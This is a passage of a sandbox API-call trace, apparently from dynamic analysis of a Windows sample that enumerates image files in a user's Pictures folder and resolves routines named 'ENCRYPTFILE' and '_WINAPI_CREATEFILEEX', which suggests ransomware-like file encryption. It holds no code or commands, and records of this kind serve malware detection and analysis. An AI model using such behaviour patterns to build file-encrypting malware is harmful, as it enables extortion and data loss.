ftCreationTime.dwHighDateTime=0x1d5f077, ftLastAccessTime.dwLowDateTime=0x260c180, ftLastAccessTime.dwHighDateTime=0x1d5e6a7, ftLastWriteTime.dwLowDateTime=0x260c180, ftLastWriteTime.dwHighDateTime=0x1d5e6a7, nFileSizeHigh=0x0, nFileSizeLow=0x6f4b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="7mFkSCM1jm586Ad_.png", cAlternateFileName="7MFKSC~1.PNG")) returned 0 [0092.583] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0092.584] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0092.584] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0092.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0092.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0092.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0092.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0092.585] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0092.585] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0092.585] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0092.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0092.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0092.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0092.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0092.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5a98 [0092.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0092.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0092.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0092.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0092.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca070 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0092.586] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0092.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0092.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0092.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0092.586] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0092.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0092.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0092.586] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7yKccLuS8OBSzjABi0L.bmp", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e2e8c0, ftCreationTime.dwHighDateTime=0x1d5e92b, ftLastAccessTime.dwLowDateTime=0x172e55b0, ftLastAccessTime.dwHighDateTime=0x1d5ee4e, ftLastWriteTime.dwLowDateTime=0x172e55b0, ftLastWriteTime.dwHighDateTime=0x1d5ee4e, nFileSizeHigh=0x0, nFileSizeLow=0xc713, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="7yKccLuS8OBSzjABi0L.bmp", cAlternateFileName="7YKCCL~1.BMP")) returned 0x41ac440 [0092.587] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0092.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0092.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0092.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0092.587] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0092.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0092.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23e0 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0092.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9fe0 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0092.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0092.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0092.588] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0092.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0092.588] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0092.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0092.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0092.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0092.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0092.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0092.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca040 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0092.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0092.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0092.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0092.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0092.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0092.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0092.590] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0092.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0092.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0092.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0092.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.592] 